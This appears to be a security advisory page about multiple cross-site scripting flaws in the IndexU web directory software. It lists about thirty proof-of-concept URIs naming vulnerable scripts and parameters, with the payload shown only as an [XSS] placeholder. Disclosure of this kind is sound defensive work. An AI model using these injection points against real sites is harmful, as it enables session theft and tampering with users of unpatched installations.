• info
• discussion
• exploit
• solution
• references

IndexU Multiple Cross-Site Scripting Vulnerabilities

Attackers can exploit these issues via a web client.

The following proof-of-concept URIs are available:

http://www.example.com/INDEXU_PATH/upgrade.php?pflag=upgrade&true&gateway=[XSS]
http://www.example.com/INDEXU_PATH/suggest_category.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/user_detail.php?u=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?friend_name=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?friend_email=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?my_name=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?my_email=[XSS]
http://www.example.com/INDEXU_PATH/tell_friend.php?id=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?email=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?name=[XSS]
http://www.example.com/INDEXU_PATH/sendmail.php?subject=[XSS]
http://www.example.com/INDEXU_PATH/send_pwd.php?email=[XSS]
http://www.example.com/INDEXU_PATH/send_pwd.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/send_pwd.php?username=[XSS]
http://www.example.com/INDEXU_PATH/search.php?keyword=[XSS]
http://www.example.com/INDEXU_PATH/register.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/register.php?username=[XSS]
http://www.example.com/INDEXU_PATH/register.php?password=[XSS]
http://www.example.com/INDEXU_PATH/register.php?password2=[XSS]
http://www.example.com/INDEXU_PATH/register.php?email=[XSS]
http://www.example.com/INDEXU_PATH/power_search.php?url=[XSS]
http://www.example.com/INDEXU_PATH//power_search.php?contact_name=[XSS]
http://www.example.com/INDEXU_PATH//power_search.php?email=[XSS]
http://www.example.com/INDEXU_PATH/new.php?path=[XSS]
http://www.example.com/INDEXU_PATH//new.php?total=[XSS]
http://www.example.com/INDEXU_PATH/mailing_list.php?error_msg=[XSS]
http://www.example.com/INDEXU_PATH/mailing_list.php?email=[XSS]
http://www.example.com/INDEXU_PATH/login.php?error_msg=[XSS]